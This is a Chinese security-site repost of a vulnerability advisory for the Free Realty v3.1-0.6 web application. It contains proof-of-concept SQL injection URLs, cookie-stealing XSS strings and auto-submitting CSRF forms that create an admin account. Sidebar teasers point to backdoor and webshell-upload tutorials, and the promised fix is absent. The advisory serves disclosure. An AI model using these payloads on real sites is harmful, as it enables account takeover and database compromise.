Free Realty v3.1-0.6的缺陷介绍及其修复方法

所属分类: 网络安全 / 黑客教程 阅读数: 142
收藏 0 赞 0 分享
标题:Free Reality v3.1-0.6 - Multiple Web Vulnerabilities
介绍:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end
user does not need to be fluent in web page design. Read more in the demo site
This is a fork of
software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
continued development on the 2.x series. Other sites of note regarding 2.x development
www.1axn.com/gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own.
影响版本:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Reality v3.1-0.6 web application.
问题类型:Remote
技术分析:
========
1.1
A remote SQL Injection vulnerability is detected in the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on
the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /admin/admin.php?edit=
1.2
Multiple persistent input validation vulnerabilities are detected in the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action.
Vulnerable Module(s):
[+] admin/agenteditor.php - inject notes about the Agent
[+] agentadmin.php?edit=2 - inject title / preview description: / Long description: / notes
[+] agentadmin.php?action=addlisting inject title / preview description: / Long description: / notes
[+] admin/adminfeatures.php - Add new feature
1.3
A cross site request forgery vulnerability is detected in in the Free Reality v3.1-0.6 web application. The bugs allow remote
attackers with high required user inter action to edit user accounts. Successful exploitation can lead to account access.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the
remote can implement his own values for the update because of no form or token protection. When admin get now forced to
execute the script via link he is executing the new value on the update of the application if his session is not expired.
Vulnerable Module(s):
[+] admin/agenteditor.php?action=addagent - Add agent
[+] admin/agenteditor.php?adminmodify=2 - Modify Agent
测试证明:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
PoC:
https://www.jb51.net /FR/agentdisplay.php?view=1[SQL-INJECTION!]
http://127.0.0.1/FR/admin/admin.php?edit=2[SQL-INJECTION!]
1.2
The persistent input validation vulnerability can be exploited by remote attackers with medium till low required user inter action.
For demonstration or reproduce ...
Note:
The issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings:
>"<<iframe src=http:// www.jb51.net />37</iframe> ... or
>"<script>alert(document.cookie)</script><div style="1
1.3
The csrf vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ...
<html>
<form name="test" action="http://127.0.0.1/FR/admin/agenteditor.php?adminmodify=2" method="post">
<input type="hidden" name="agent" value="test2"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>
<html>
<form name="addagent" action="http://127.0.1.1/FR/admin/agenteditor.php?action=addagent" method="post">
<input type="hidden" name="agent" value="test3"><br/>
<input type="hidden" name="agenttitle" value="test3"><br/>
<input type="hidden" name="agentpass" value="test3"><br/>
<input type="hidden" name="agentfax" value="test3"><br/>
<input type="hidden" name="agentcell" value="test3"><br/>
<input type="hidden" name="agentphone" value="test3"><br/>
<input type="hidden" name="agenturl" value="test3"><br/>
<input type="hidden" name="agentemail=" value="test3@hotmail.com"><br/>
<input type="hidden" name="user_level" value="admin"><br/>
<input type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>
Risk:
=====
1.1
The security risk of the remote SQL injection vulnerability is estimated as critical.
1.2
The security risk of the persistent input validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request forgery vulnerability is estimated as low(+).
更多精彩内容其他人还在看

pstools使用方法

  软件名称:Pstools   运行平台:Windows   软件授权:免费软件   软件大小:550KB   下面我用一个实例来讲解这个命令的使用。假设我要对192.168.0.8计算机进行远程管理,那么我可以先打开一个命令行窗口。在命令行中输入以下命令后敲回车:   D:t
收藏 0 赞 0 分享

命令行下一种新的加帐号的方法

  今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个Shell.Users就足够了
收藏 0 赞 0 分享

如何使用sqlcmd.exe 连接到数据库引擎

     SQL Server 支持使用 TCP/IP 网络协议(默认值)、命名管道协议和 VIA 协议的客户端通信。如果客户端要连接到同一计算机上的数据库引擎实例,则也可以使用共享内存协议。通常有三种选择协议的方法。sqlcmd 实用工具
收藏 0 赞 0 分享

按5次shift 键后门 利用方法

原理:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe
收藏 0 赞 0 分享

突破一流拦截 上传限制的方法

在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截
收藏 0 赞 0 分享

命令行下一种新的添加帐号的方法

天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户
收藏 0 赞 0 分享

PHP 万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百
收藏 0 赞 0 分享

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

其实呢,漏洞一点都不新,在t00ls都躺了N天了,就是不见有人转出来..没记错的话这已经是华众第四次出漏洞了..而且每次犯的还都是一个毛病,我很看好他们的程序员.
收藏 0 赞 0 分享

防止apache的php扩展名解析漏洞

今天看到ecshop后台拿webshell的文章,想起来很长时间很多版本存在的apache的php扩展名解析漏洞
收藏 0 赞 0 分享

批处理也疯狂

  @echo off   set c=00123456789ABCDEF0   :loop   set /a num=%random%%%16   call set col=%%c:~%num%,2%%   COLOR %col%   ping -n3 127.1>
收藏 0 赞 0 分享
查看更多